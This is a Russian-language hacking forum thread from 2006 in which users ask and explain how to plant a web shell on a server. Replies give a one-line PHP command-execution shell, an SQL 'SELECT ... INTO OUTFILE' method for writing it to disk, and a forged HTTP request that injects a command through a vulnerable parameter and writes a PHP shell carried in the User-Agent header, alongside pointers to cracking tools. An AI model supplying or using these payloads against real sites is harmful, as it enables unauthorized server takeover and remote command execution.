Заливка shell при помощи потделки Http запроса

Discussion in 'Песочница' started by Dimazzz, 28 Oct 2006.

  1. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Огрмная просьба , расскажите о этом способе заливки шела по подробнее никак не могу понять как это сделать. Если кто еще умеет через Sql в админке тоже огромная просьба рассказать. Просто другие варианты отпали.
     
  2. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    Полноценный шелл залит.
     
  3. TaNkist

    TaNkist Elder - Старейшина

    Joined:
    6 Apr 2006
    Messages:
    147
    Likes Received:
    47
    Reputations:
    19
    Подделка HTTP-запроса:
    Может тебе поможет софтина RAW HTTP REQUEST (_h0ld-up-team.net.ru). Это прога отправит пакет, который создает на сервере файл и пропишет в него простой php-шелл.
    SQL
    Создаешь базу с 1 полем, со строкой:
    PHP:
    <?system($_GET['cmd'])?>
    Затем составляешь SQL-запрос:
    SELECT <название поля> FROM <Имя таблицы> INTO OUTFILE 'путь к шеллу'
    Единственное условие ты должен иметь права на запись в папку, куда собираешься залить шелл.
     
    1 person likes this.
  4. Sharky

    Sharky Elder - Старейшина

    Joined:
    1 May 2006
    Messages:
    487
    Likes Received:
    312
    Reputations:
    46
    по поводу RAW HTTP REQUEST можно поподробней...как составлять запрос?
     
  5. TaNkist

    TaNkist Elder - Старейшина

    Joined:
    6 Apr 2006
    Messages:
    147
    Likes Received:
    47
    Reputations:
    19
    Примерный запрос
    Code:
    GET Уязвимый скрипт?Уязвимый параметр=|echo%20$HTTP_USER_AGENT%20>%20путь к шеллу|    
     HTTP/1.1
    Host: Уязвимый хост
    User-Agent: <? system(GET['cmd']) ?>
    
     
  6. S1nt3z

    S1nt3z New Member

    Joined:
    2 Jun 2005
    Messages:
    17
    Likes Received:
    2
    Reputations:
    -3
    хы .. можно воспользоваться прогой от отечественного произодителя Antichat :)
    _http://antichat.ru/inetcrack/ :)
     
  7. Soul Linker

    Soul Linker New Member

    Joined:
    5 Sep 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    А вообще есть мануал по разным способам заливки шелла? или их не столь много?
     
  8. S1nt3z

    S1nt3z New Member

    Joined:
    2 Jun 2005
    Messages:
    17
    Likes Received:
    2
    Reputations:
    -3
    Just google it! :)
    попробуй разобраться сам .. больше опыта будет ;)
     
Loading...